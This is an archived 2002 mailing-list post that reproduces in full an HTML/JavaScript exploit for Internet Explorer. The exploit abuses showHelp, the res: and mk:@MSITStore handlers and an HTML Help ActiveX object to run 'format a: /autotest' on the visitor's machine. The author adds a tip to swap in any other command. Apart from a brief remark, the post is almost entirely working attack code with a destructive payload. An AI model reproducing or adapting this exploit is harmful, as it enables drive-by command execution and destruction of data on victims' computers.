Re: ZDnet forum: IE formatting local drive

From: Gossi The Dog (gossiat_private)
Date: Thu Nov 14 2002 - 03:35:10 PST

Next message: Eric Rescorla: "Security holes... Who cares?"

Previous message: Alan DeKok: "Unofficial statement re: tcpdump and libpcap"
Maybe in reply to: Alan Rouse: "ZDnet forum: IE formatting local drive"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

FYI, the HTML code is;


------------------------------------------------------------------------

<html>
<head>
</head>

<script LANGUAGE="JavaScript">

prog = 'command';
args = '/k format   a: /autotest';

if (!location.hash) {
  showHelp(location+"#1");
  showHelp("iexplore.chm");
  blur();
}
else if (location.hash == "#1")
  open(location+"2").blur();
else {
  f = opener.location.assign;
  opener.location="res:";
  f("javascript:location.replace('mk:@MSITStore:C:')");
  setTimeout('run()',1000);
}
function run() {
  f("javascript:document.write('<object id=c1 classid=clsid:adb"+
   "880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
   "=ShortCut><param name=Item1 value=\","+prog+","+args+"\"></"+
   "object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
   "-00aa003b7a11><param name=Command value=Close></object>')");
  f("javascript:c1.Click();c2.Click();c3.Click();");
  close();
}
</script>
<body>
<h1>Testing IE Execute Exploit</h1>
</body>
</html>

-----------------------------------------------------------------------

Change 'args' to a different command (/autotest doesn't work well on
Windows 2000, for example).


Oh dear.

Gossi

Next message: Eric Rescorla: "Security holes... Who cares?"
Previous message: Alan DeKok: "Unofficial statement re: tcpdump and libpcap"
Maybe in reply to: Alan Rouse: "ZDnet forum: IE formatting local drive"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sun Nov 17 2002 - 12:48:24 PST